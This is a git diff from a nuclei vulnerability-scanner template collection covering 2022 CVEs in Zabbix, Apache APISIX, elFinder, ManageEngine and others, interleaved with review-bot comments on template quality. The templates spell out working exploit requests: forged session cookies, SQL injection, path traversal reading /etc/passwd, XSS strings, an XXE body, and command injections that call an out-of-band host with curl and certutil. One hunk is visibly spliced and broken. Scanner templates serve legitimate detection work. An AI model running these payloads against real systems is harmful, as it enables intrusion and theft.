Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: dsl - dsl: - - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml b/nuclei-templates/CVE-2022/CVE-2022-23134.yaml deleted file mode 100644 index d3252104e3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml +++ /dev/null 
@@ -1,43 +0,0 @@ -id: CVE-2022-23134 - -info: - name: Zabbix Setup Configuration Authentication Bypass - author: bananabr - severity: medium - description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. - reference: - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 - - https://support.zabbix.com/browse/ZBX-20384 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23134 - tags: cve,cve2022,zabbix,auth-bypass,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/setup.php" - - "{{BaseURL}}/setup.php" - - headers: - Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Database" - - "host" - - "port" - - "Zabbix" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23347.yaml b/nuclei-templates/CVE-2022/CVE-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23347.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23779.yaml b/nuclei-templates/CVE-2022/CVE-2022-23779.yaml new file mode 100644 index 0000000000..d6c672d774 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23779.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2022-23779 + +info: + name: Zoho ManageEngine - Internal Hostname Disclosure + author: cckuailong + severity: medium + description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + reference: + - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html + - https://github.com/fbusr/CVE-2022-23779 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23779 + metadata: + fofa-query: app="ZOHO-ManageEngine-Desktop" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-23779 + cwe-id: CWE-200 + tags: cve,cve2022,zoho,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/themes" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + + - type: word + part: header + words: + - '/themes/' + - 'text/html' + condition: and + + - type: word + part: location + words: + - '{{Host}}' + negative: true + + - type: word + words: + - '

301 Moved Permanently

' + + - type: regex + part: location + regex: + - 'https?:\/\/(.*):' + + extractors: + - type: regex + part: location + group: 1 + regex: + - 'https?:\/\/(.*):' + +# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml deleted file mode 100644 index 84b802eba2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-23881 - -info: - name: zzzphp v2.1.0 RCE - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - tags: cve,cve2022,rce,zzzphp,zzzcms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml b/nuclei-templates/CVE-2022/CVE-2022-24112.yaml deleted file mode 100644 index 5f79eaed68..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml +++ /dev/null 
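Review bot: The `location` regex `https?:\/\/(.*):`, used in both the last matcher and the extractor of the CVE-2022-23779 template, is greedy and only requires some host followed by a colon. Any 301 that redirects to a host other than `{{Host}}` with an explicit port is therefore reported, including a public canonical name, load balancer or CDN, and nothing checks that the name is internal. Tightening the capture to `'https?:\/\/([^\/:]+):'` keeps the extracted value to the host part. A comment should also state that a hit needs a manual check that the hostname is not already public.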
@@ -1,80 +0,0 @@ -id: CVE-2022-24112 - -info: - name: Apache APISIX - Remote Code Execution - author: Mr-xn - severity: critical - description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - reference: - - https://www.openwall.com/lists/oss-security/2022/02/11/3 - - https://twitter.com/sirifu4k1/status/1496043663704858625 - - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). 
- classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-24112 - cwe-id: CWE-290 - metadata: - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org - shodan-query: title:"Apache APISIX Dashboard" - tags: cve,cve2022,apache,rce,apisix,oast,kev - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - { - "headers":{ - "X-Real-IP":"127.0.0.1", - "Content-Type":"application/json" - }, - "timeout":1500, - "pipeline":[ - { - "method":"PUT", - "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}" - } - ] - } - - | - GET /api/{{randstr}} HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - '"reason":"OK"' - - '"status":200' - condition: and - - - type: status - status: - - 200 - - - type: word - part: interactsh_protocol - words: - - 'http' - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - 'GET \/([a-z-]+) HTTP' - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml deleted file mode 100644 index 073b046241..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2022-24129 -info: - name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery - author: 0x_Akoko - severity: high - description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services. - reference: - - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF - - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP - - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 - - http://shibboleth.net/community/advisories/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N - cvss-score: 8.2 - cve-id: CVE-2022-24129 - cwe-id: CWE-918 - tags: cve,cve2022,ssrf,oidc,shibboleth -requests: - - method: GET - path: - - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: word - part: interactsh_request - words: - - "ShibbolethIdp" diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml new file mode 100644 index 0000000000..706599f0a0 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2022-24181 +info: + name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) + author: lucasljm2001,ekrause + severity: medium + description: | + Detects an XSS vulnerability in Open Journals System. + reference: + - https://www.exploit-db.com/exploits/50881 + - https://github.com/pkp/pkp-lib/issues/7649 + - https://youtu.be/v8-9evO2oVg + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 + - https://nvd.nist.gov/vuln/detail/cve-2022-24181 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24181 + metadata: + verified: true + tags: cve,cve2022,xss,oss,pkp-lib +requests: + - raw: + - | + GET /iupjournals/index.php/esj HTTP/2 + Host: {{Hostname}} + X-Forwarded-Host: foo">alert(document.domain)' - - '' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml deleted file mode 100644 index 40edb599f1..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml +++ /dev/null 
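Review bot: The raw request path `/iupjournals/index.php/esj` looks specific to a single journal deployment, so the check will not reach other Open Journals System installs. The journal context should come from `{{BaseURL}}` or a template variable, with a comment saying what it must point to. The `classification` block has no `cwe-id` although the finding is XSS (`cwe-id: CWE-79`), and the cve.mitre.org reference passes `name=2022-24181` without the `CVE-` prefix. The rest of this hunk, including its matchers, is damaged on this page and was not reviewed.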
@@ -1,31 +0,0 @@ -id: CVE-2022-26233 - -info: - name: Barco Control Room Management Suite - Directory Traversal - author: 0x_akoko - severity: high - description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. - reference: - - https://0day.today/exploit/37579 - - https://www.cvedetails.com/cve/CVE-2022-26233 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-26233 - cwe-id: CWE-22 - tags: cve,cve2022,barco,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml deleted file mode 100644 index 21b4f71879..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2022-26960 -info: - name: elFinder <=2.1.60 - Local File Inclusion - author: pikpikcu - severity: critical - description: | - elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. - reference: - - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db - - https://www.synacktiv.com/publications.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-26960 - cwe-id: CWE-22 - metadata: - verified: true - tags: cve,cve2022,lfi,elfinder -requests: - - raw: - - | - GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml b/nuclei-templates/CVE-2022/CVE-2022-27927.yaml deleted file mode 100644 index 96820d1ca3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2022-27927 -info: - name: Microfinance Management System 1.0 - SQL Injection - author: lucasljm2001,ekrause - severity: critical - description: | - Microfinance Management System 1.0 is susceptible to SQL Injection. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - - https://www.exploit-db.com/exploits/50891 - - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-27927 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,microfinance -variables: - num: "999999999" -requests: - - raw: - - | - GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml new file mode 100644 index 0000000000..8124852465 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2022-28079
+info:
+ name: College Management System - SQL Injection
+ author: ritikchaddha
+ severity: high
+ description: |
+ College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.
+ reference:
+ - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
+ - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-28079
+ - https://code-projects.org/college-management-system-in-php-with-source-code/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-28079
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,cms,collegemanagement
+variables:
+ num: "999999999"
+requests:
+ - raw:
+ - |
+ POST /admin/asign-single-student-subjects.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{{md5({{num}})}}'
+ - type: status
+ status:
+ - 302
diff --git a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml
deleted file mode 100644
index dc59377c75..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml
+++ /dev/null
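Review bot: The classification in CVE-2022-28079.yaml carries `PR:L` and the first reference is titled as an authenticated issue, but the request block sends a single POST with no login step and no `cookie-reuse`, and the tags lack `authenticated`. If the endpoint really needs a session, the template should log in first with `{{username}}`/`{{password}}` as the Car Rental templates in this commit do; if it does not, the `info` block should say so. The word matcher has no `part:` and is paired with status `302`; add `part: body` and a comment explaining why the hash is expected in a redirect response.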
@@ -1,65 +0,0 @@ -id: CVE-2022-28080 -info: - name: Royal Event - SQL Injection - author: lucasljm2001,ekrause,ritikchaddha - severity: high - description: | - Detects an SQL Injection vulnerability in Royal Event System - reference: - - https://www.exploit-db.com/exploits/50934 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated,cms,royalevent -requests: - - raw: - - | - POST /royal_event/ HTTP/1.1 - Host: {{Hostname}} - Content-Length: 353 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="username" - - {{username}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="password" - - {{password}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="login" - - - ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | - POST /royal_event/btndates_report.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="todate" - - 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="search" - - 3 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="fromdate" - - 01/01/2011 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '{{md5("{{randstr}}")}}' 
- - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml b/nuclei-templates/CVE-2022/CVE-2022-28219.yaml deleted file mode 100644 index a812336fd8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2022-28219 -info: - name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an - unauthenticated XML entity injection attack that can lead to remote code execution. - reference: - - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html - - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ - - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 - remediation: | - Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus - is configured with a dedicated service account with restricted privileges. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-28219 - cwe-id: CWE-611 - metadata: - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" - verified: "true" - tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth -requests: - - method: POST - path: - - "{{BaseURL}}/api/agent/tabs/agentData" - headers: - Content-Type: application/json - body: | - [ - { - "DomainName": "{{Host}}", - "EventCode": 4688, - "EventType": 0, - "TimeGenerated": 0, - "Task Content": " %xxe; ]>" - } - ] - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: word - part: body - words: - - "ManageEngine" - -# Enhanced by mp on 2022/07/04 
diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/CVE-2022-28365.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-28365.yaml rename to nuclei-templates/CVE-2022/CVE-2022-28365.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29014.yaml b/nuclei-templates/CVE-2022/CVE-2022-29014.yaml deleted file mode 100644 index 8d1df858e8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29014.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-29014 -info: - name: Razer Sila Gaming Router v2.0.441_api-2.0.418 - LFI - author: edoardottt - severity: high - description: A local file inclusion vulnerability in Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to read arbitrary files. - reference: - - https://www.exploit-db.com/exploits/50864 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29014 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29014 - tags: cve,cve2022,razer,lfi,router -requests: - - raw: - - | - POST /ubus/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml deleted file mode 100644 index 191cb6e9b8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2022-29298 -info: - name: SolarView Compact 6.00 - Directory Traversal - author: ritikchaddha - severity: high - description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal. - reference: - - https://www.exploit-db.com/exploits/50950 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29298 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,lfi,solarview -requests: - - method: GET - path: - - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-29303.yaml rename to nuclei-templates/CVE-2022/CVE-2022-29303.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29383.yaml b/nuclei-templates/CVE-2022/CVE-2022-29383.yaml deleted file mode 100644 index da7756d355..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29383.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2022-29383 -info: - name: NETGEAR ProSafe SSL VPN firmware - SQL Injection - author: elitebaz - severity: critical - description: | - NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. - reference: - - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29383 - metadata: - verified: "true" - tags: cve,cve2022,sqli,netgear,router -requests: - - raw: - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - req-condition: true - matchers: - - type: dsl - dsl: - - contains(body_1, "User authentication Failed") - - contains(body_2, "User Login Failed for SSLVPN User.") - condition: and - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml deleted file mode 100644 index f6b5e980e8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2022-29548 -info: - name: WSO2 Management Console - Reflected XSS - author: edoardottt - severity: medium - description: | - A reflected XSS issue exists in the Management Console of several WSO2 products. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30776.yaml b/nuclei-templates/CVE-2022/CVE-2022-30776.yaml new file mode 100644 index 0000000000..13cca2459e --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30776.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2022-30776
+info:
+ name: Atmail - Cross Site Scripting
+ author: 3th1c_yuk1
+ severity: medium
+ description: |
+ atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter.
+ reference:
+ - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
+ - https://www.atmail.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-30776
+ - https://help.atmail.com/hc/en-us/sections/115003283988
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-30776
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.html:"atmail"
+ verified: "true"
+ tags: cve,cve2022,atmail,xss
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Error: 1"
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml
deleted file mode 100644
index ada90dc224..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml
+++ /dev/null
